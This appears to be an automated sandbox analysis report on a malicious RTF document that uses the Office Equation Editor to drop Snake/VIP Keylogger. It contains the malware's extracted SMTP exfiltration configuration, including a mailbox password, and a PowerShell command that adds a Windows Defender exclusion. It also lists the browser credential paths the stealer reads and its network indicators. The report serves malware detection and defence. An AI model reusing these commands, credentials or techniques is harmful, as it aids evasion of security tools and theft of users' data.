Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Xkl0PnD8zFPjfh1.wiz.rtf

Overview

General Information

Sample name:Xkl0PnD8zFPjfh1.wiz.rtf
Analysis ID:1558704
MD5:f6e89e6c3ab17d8d58699ccefeaf3c8d
SHA1:86c245d0a2ef138aa7afca6bb43316e251b07c68
SHA256:32f5bf26d32b42212ada3e88017ad037c6c84f760a64585252576d893a00ff5f
Tags:RTFuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3520 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3600 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wealthcharliebgk.exe (PID: 3756 cmdline: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe" MD5: 9D980CAD65D26D5E36BD306044B26AC9)
        • powershell.exe (PID: 3844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • wealthcharliebgk.exe (PID: 3860 cmdline: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe" MD5: 9D980CAD65D26D5E36BD306044B26AC9)
    • EQNEDT32.EXE (PID: 4084 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "logs5@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logs5@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Xkl0PnD8zFPjfh1.wiz.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x12a47:$obj2: \objdata
  • 0x12a5d:$obj3: \objupdate
  • 0x12a1f:$obj5: \objautlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.wealthcharliebgk.exe.3670430.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.wealthcharliebgk.exe.3670430.5.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              5.2.wealthcharliebgk.exe.3670430.5.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                5.2.wealthcharliebgk.exe.3670430.5.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                5.2.wealthcharliebgk.exe.3670430.5.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x394b6:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b59:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38db6:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39795:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 27 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 87.120.84.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3600, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3600, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe

                System Summary

                barindex
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3600, Protocol: tcp, SourceIp: 87.120.84.39, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ParentImage: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ParentProcessId: 3756, ParentProcessName: wealthcharliebgk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ProcessId: 3844, ProcessName: powershell.exe
                Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, NewProcessName: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3600, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ProcessId: 3756, ProcessName: wealthcharliebgk.exe
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, NewProcessName: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3600, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ProcessId: 3756, ProcessName: wealthcharliebgk.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ParentImage: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ParentProcessId: 3756, ParentProcessName: wealthcharliebgk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ProcessId: 3844, ProcessName: powershell.exe
                Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, QueryName: checkip.dyndns.org
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3600, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ParentImage: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ParentProcessId: 3756, ParentProcessName: wealthcharliebgk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ProcessId: 3844, ProcessName: powershell.exe
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3844, TargetFilename: C:\Users\user\AppData\Local\Temp\obnb3a4t.cfs.ps1

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-19T18:08:04.164643+010020220501A Network Trojan was detected87.120.84.3980192.168.2.2249161TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-19T18:08:04.342515+010020220511A Network Trojan was detected87.120.84.3980192.168.2.2249161TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-19T18:08:12.766539+010028033053Unknown Traffic192.168.2.2249164188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-19T18:08:11.081951+010028032742Potentially Bad Traffic192.168.2.2249162193.122.130.080TCP
                2024-11-19T18:08:12.338005+010028032742Potentially Bad Traffic192.168.2.2249162193.122.130.080TCP
                2024-11-19T18:08:14.160503+010028032742Potentially Bad Traffic192.168.2.2249165193.122.130.080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Xkl0PnD8zFPjfh1.wiz.rtfAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306879
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeAvira: detection malicious, Label: HEUR/AGEN.1306879
                Found malware configuration
                Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs5@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587", "Version": "4.4"}
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs5@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exeReversingLabs: Detection: 31%
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeReversingLabs: Detection: 31%
                Multi AV Scanner detection for submitted file
                Source: Xkl0PnD8zFPjfh1.wiz.rtfReversingLabs: Detection: 44%
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org

                Exploits

                barindex
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 87.120.84.39 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_002469B8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00249743h8_2_00249330
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 0024767Dh8_2_00247490
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00248007h8_2_00247490
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00249181h8_2_00248EC4
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 0024EB89h8_2_0024E8A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_002471C9
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 0024F4B9h8_2_0024F1D9
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 0024FDE9h8_2_0024FB08
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 0024F021h8_2_0024ED40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 0024F951h8_2_0024F670
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00249743h8_2_00249672
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_00246FEA
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C85AAh8_2_005C82B0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C4321h8_2_005C4050
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CE54Ah8_2_005CE250
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C5A19h8_2_005C5748
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CBA42h8_2_005CB748
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C0311h8_2_005C0040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C7111h8_2_005C6E40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C8F3Ah8_2_005C8C40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C6349h8_2_005C6078
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C8A72h8_2_005C8778
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C0C41h8_2_005C0970
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C7A41h8_2_005C7770
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CF86Ah8_2_005CF570
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C2339h8_2_005C2068
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CCD62h8_2_005CCA68
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C3A09h8_2_005C3760
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CA25Ah8_2_005C9F60
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C50E9h8_2_005C4E18
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CEA12h8_2_005CE718
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C67E2h8_2_005C6510
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CBF0Ah8_2_005CBC10
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C10D9h8_2_005C0E08
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C7F7Ah8_2_005C7C08
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C9402h8_2_005C9108
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C27D1h8_2_005C2500
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C1A09h8_2_005C1738
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CFD32h8_2_005CFA38
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C3101h8_2_005C2E30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CD22Ah8_2_005CCF30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CA722h8_2_005CA428
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C07A9h8_2_005C04D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C75A9h8_2_005C72D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CC3D2h8_2_005CC0D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C1EA1h8_2_005C1BD0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C98CAh8_2_005C95D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C3599h8_2_005C32C8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CDBBAh8_2_005CD8C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CD6F2h8_2_005CD3F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CABEAh8_2_005CA8F0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C47B9h8_2_005C44E8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C5EB1h8_2_005C5BE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CEEDAh8_2_005CEBE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C2C69h8_2_005C2998
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C9D92h8_2_005C9A98
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CE082h8_2_005CDD88
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C4C51h8_2_005C4980
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CB57Ah8_2_005CB280
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C3E89h8_2_005C3BB8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005CB0B2h8_2_005CADB8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C5581h8_2_005C52B0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 005C6C79h8_2_005C69A8
